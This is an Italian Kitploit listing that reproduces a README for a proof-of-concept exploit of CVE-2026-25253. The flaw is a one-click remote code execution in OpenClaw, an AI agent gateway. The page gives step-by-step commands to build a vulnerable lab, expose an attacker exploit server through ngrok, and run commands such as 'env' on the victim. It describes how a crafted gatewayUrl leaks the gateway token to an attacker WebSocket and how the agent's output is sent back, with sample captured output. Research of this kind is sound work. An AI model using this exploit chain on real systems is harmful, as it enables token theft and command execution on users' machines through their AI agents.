Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-25253 — # Esfiltrazione di token di autenticazione OpenClaw | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2026-25253
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

# Esfiltrazione di token di autenticazione OpenClaw

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-25253 OpenClaw RCE in 1 clic

★ CVE-2026-25253 OpenClaw PoC per l'esecuzione remota di codice in 1 clic ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

Descrizione

CVE-2026-25253 : Vulnerabilità di esfiltrazione del token di autenticazione OpenClaw

descrizione: OpenClaw (noto anche come clawdbot o Moltbot) prima della v2026.1.29 consente agli attaccanti di esfiltrare un token di autenticazione del gateway memorizzato fornendo un valore di query-string gatewayUrl appositamente costruito alla Control UI, che stabilisce automaticamente una connessione WebSocket senza validazione o conferma dell'utente. Ciò può portare a un accesso non autorizzato al gateway e all'esecuzione remota di codice in 1 clic.

Requisiti

  • Docker (Docker Desktop su Windows)
  • Python 3.x (lato attaccante)

File

  • Dockerfile — crea l'ambiente vulnerabile OpenClaw
  • templates/ — pagine web dannose usate dall'exploit
  • config.txt — configurazione OpenClaw usata nell'ambiente vittima
  • exploit.py — server dell'exploit
  • requirements.txt — dipendenze del PoC

Configurazione dell'ambiente

  1. Crea l'immagine Docker
root@kitploit:~
docker build -t openclaw-vuln .
  1. Esegui l'ambiente (Windows)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. Crea un tunnel SSH
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • Password: openclawlab
  1. Accedi alla Control UI di OpenClaw Apri il seguente URL nel browser
root@kitploit:~
http://127.0.0.1:18789/
  1. Inserisci il Gateway Token d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. Fai clic su Connect
  3. Apri la scheda Config
  4. Incolla il contenuto di config.txt
  5. Sostituisci il campo API key con la tua chiave API OpenAI
  6. Salva la configurazione
  7. Conferma che l'agente risponda normalmente

Prova di concetto (PoC)

  1. Installa le dipendenze (lato attaccante)
root@kitploit:~
pip3 install -r requirements.txt
  1. Esponi il server dell'exploit via HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • Copia il nome host di forwarding generato
  1. Esegui il server dell'exploit
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

Esempio:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. Attiva l'attacco
  1. Apri la pagina dannosa esposta dal server dell'exploit
  2. Simula l'interazione della vittima con la pagina
  3. Attiva il flusso dell'exploit dal browser

Flusso dell'attacco

  1. Un URL dannoso modifica il gatewayUrl della Control UI della vittima
  2. Il browser si connette automaticamente all'endpoint WebSocket controllato dall'attaccante
  3. Il token di autenticazione del gateway viene divulgato all'attaccante
  4. La pagina dannosa usa il token rubato per aprire una nuova connessione WebSocket al gateway OpenClaw locale della vittima
  5. Una richiesta di esecuzione comandi viene inviata tramite l'agente
  6. Il risultato dell'esecuzione viene restituito al server dell'attaccante

Risultato atteso

  • Il browser della vittima viene reindirizzato nel flusso WebSocket dannoso
  • Il token di autenticazione del gateway viene catturato dall'attaccante
  • L'attaccante può inviare una richiesta di esecuzione comandi tramite OpenClaw
  • L'output del comando viene restituito al server dell'attaccante

Output di esempio

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

Note

  • Questo PoC ha come obiettivo OpenClaw 2026.1.24-1
  • La catena dell'exploit si basa sulla gestione vulnerabile di gatewayUrl nella Control UI
  • Per l'accesso remoto alla vittima, la pagina dannosa deve essere servita via HTTPS
  • Il gateway OpenClaw locale viene raggiunto tramite il browser della vittima come ponte

EQST Insight

Pubbliciamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
Scarica lo strumento